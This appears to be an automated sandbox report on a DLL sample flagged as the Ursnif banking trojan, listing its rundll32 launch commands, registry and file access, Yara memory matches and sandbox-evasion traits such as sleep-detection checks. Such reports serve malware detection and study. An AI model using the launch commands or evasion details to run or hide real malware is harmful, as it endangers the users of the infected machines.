                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: hFGZpat9Mf.dllVirustotal: Detection: 20%
                      Source: hFGZpat9Mf.dllReversingLabs: Detection: 32%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER410A.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@6/6@4/7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00708912 GetDiskFreeSpaceA,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007210CC GetLastError,FormatMessageA,
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3272
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00716C2C FindResourceA,
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0076B448 push dword ptr [0076FF08h]; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007080C0 push ecx; mov dword ptr [esp], ecx
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0070E154 push 0070E180h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0071611C push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072A1E4 push 0072A23Dh; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007061A2 push 007061D0h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007061A4 push 007061D0h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0071627C push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0071E254 push 0071E280h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00716238 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0070621C push 00706248h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007182BC push ecx; mov dword ptr [esp], ecx
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00714558 push 007145A5h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072C64C push 0072C6C1h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00714610 push 0071463Ch; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072C6C4 push 0072C71Dh; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072A85C push 0072A89Fh; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072A8D4 push 0072A900h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0071C8C0 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072A90C push 0072A944h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072A9A0 push 0072A9CCh; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072AA70 push 0072AAA3h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072AAD0 push 0072AAFCh; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00728AD4 push 00728B12h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00728B54 push 00728B8Ch; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072AB20 push 0072AB63h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00728B1C push 00728B48h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072ABEC push 0072AC38h; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072AB88 push 0072ABCBh; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072AC44 push 0072AC8Fh; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00706CD8 push ecx; mov dword ptr [esp], eax
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00721174 IsIconic,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E37170 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E5D24C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Found evasive API chain (may stop execution after checking system information)
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072C54C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E3C54C
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 1014
                      Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 432
                      Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 1247
                      Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 805
                      Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 867
                      Source: C:\Windows\System32\loaddll32.exeWindow / User API: threadDelayed 964
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072C54C
